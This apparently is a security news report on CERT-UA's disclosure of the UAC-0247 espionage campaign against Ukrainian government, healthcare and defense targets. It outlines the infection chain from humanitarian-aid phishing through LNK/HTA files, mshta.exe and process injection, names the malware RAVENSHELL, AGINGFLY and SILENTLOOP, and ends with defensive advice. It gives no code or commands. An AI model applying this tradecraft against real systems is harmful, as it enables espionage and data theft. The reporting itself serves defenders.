Ukraine’s national Computer Emergency Response Team, CERT-UA, has disclosed details of a new targeted cyber-espionage campaign tracked as UAC‑0247. The operation is primarily aimed at government entities and municipal healthcare organizations, including clinics and emergency medical services, with a clear objective: to achieve stealthy persistence, conduct internal reconnaissance, and steal sensitive data from infected systems.
UAC‑0247: Focus on State and Healthcare Infrastructure
According to CERT-UA, malicious activity attributed to UAC‑0247 has been observed from March to April 2026. While the exact origin of the threat actor remains unclear, the choice of victims and the tactics used indicate a strategic focus on public-sector networks and critical healthcare infrastructure.
In several incidents, traces of attempted compromise against members of Ukraine’s Defense Forces were also identified. In these cases, the attackers employed a separate malware delivery channel: malicious ZIP archives distributed via the Signal messenger, tailored specifically to this target group.
Humanitarian-Themed Phishing as Initial Access Vector
The campaign relies heavily on phishing emails that impersonate offers of humanitarian aid. Victims are prompted to follow a link to “clarify delivery details” or “register for assistance,” a theme that leverages the ongoing humanitarian context to increase click-through rates.
Clicking the link redirects users either to a legitimate but compromised website exploited via Cross-Site Scripting (XSS), or to a malicious landing page generated with the help of artificial intelligence tools. In both scenarios, the page encourages the victim to download and run a Windows shortcut file (.LNK), which serves as the entry point for the infection chain.
Infection Chain: From LNK and HTA to Code Injection via mshta.exe
The downloaded LNK file launches a remote HTML application (HTA file) using the built-in Windows utility mshta.exe. This “living-off-the-land” approach allows attackers to abuse a legitimate system binary, reducing the likelihood of early detection by traditional antivirus tools.
While the HTA application may display a decoy document or form to distract the user, it simultaneously retrieves a binary loader that injects malicious shellcode into a legitimate process such as runtimeBroker.exe. Running inside a trusted process improves stealth and complicates forensic analysis.
CERT-UA notes the use of a two-stage loader architecture. The first stage loads a proprietary executable format with custom code and data sections, its own import resolution, and relocation mechanisms. The final payload is additionally compressed and encrypted, significantly hindering static analysis and signature-based detection.
RAVENSHELL, AGINGFLY, SILENTLOOP: Custom Malware Arsenal
One of the core tools discovered in compromised environments is a TCP reverse shell dubbed RAVENSHELL. This component establishes an outbound TCP connection to the command-and-control (C2) server and enables remote command execution through the standard Windows shell cmd.exe, giving operators direct control over the infected host.
The attackers also deploy a family of malware known as AGINGFLY, together with a PowerShell script named SILENTLOOP. SILENTLOOP provides functions for command execution, automatic configuration updates, and dynamic retrieval of the C2 IP address from a Telegram channel. If the primary channel is unavailable, alternative mechanisms are used to resolve C2 infrastructure, enhancing resilience.
Written in C#, AGINGFLY functions as a full-featured remote access trojan (RAT). It communicates with its C2 servers via WebSockets, blending more easily with legitimate web traffic. Its capabilities include launching arbitrary processes, logging keystrokes, exfiltrating files, and deploying additional modules.
Analysis of multiple incidents shows that, once established, UAC‑0247 operators perform network discovery, lateral movement, and credential harvesting. Credentials and data are stolen from Chromium-based browsers and the WhatsApp desktop client, among other sources, often using adapted open-source tools and scripts to fit each victim’s environment. This behavior aligns with broader industry observations; for example, the Verizon Data Breach Investigations Report has repeatedly highlighted credential theft and lateral movement as key phases in modern intrusions.
Alternative Delivery via Signal and DLL Side-Loading
For attacks against Defense Forces personnel, CERT-UA reports a different initial vector: malicious ZIP archives delivered over Signal. These archives contain files crafted to exploit DLL side-loading, a technique where a legitimate application inadvertently loads a malicious DLL with a trusted name and location.
In this scenario, the trusted application launches and loads the attacker-controlled DLL, which in turn deploys AGINGFLY within the context of a legitimate process. This makes detection more difficult and allows the malware to operate under the guise of trusted software.
Defensive Measures and Risk Mitigation for Organizations
CERT-UA recommends reducing the attack surface by restricting or blocking execution of high-risk file types and scripting engines, including LNK, HTA, JS, and system utilities such as mshta.exe, powershell.exe, and wscript.exe, except where their use is clearly justified and controlled.
Organizations are further advised to implement application allowlisting, deploy modern Endpoint Detection and Response (EDR) solutions to identify anomalous process behavior and network connections, and apply strong network segmentation to limit lateral movement. Regular user awareness training remains critical, particularly on recognizing phishing emails themed around humanitarian or partnership initiatives, which are repeatedly exploited in real-world campaigns.
Global incident statistics consistently show that healthcare and public-sector entities are among the most targeted verticals, due to the high value of medical and citizen data and the operational impact of service disruption. Against this backdrop, the UAC‑0247 campaign underscores how a combination of phishing, abuse of legitimate Windows tools, and sophisticated loaders enables attackers to bypass traditional defenses and access critical information.
Organizations in government, healthcare, and defense should urgently review their security policies, harden the handling of attachments and scripts, and enhance monitoring for suspicious activity involving built-in Windows utilities and messaging platforms. Close attention to advisories from CERT-UA and other trusted incident response centers will improve early detection. The faster such campaigns are identified and contained, the fewer opportunities attackers have to weaponize stolen data against national infrastructure and civilian populations.
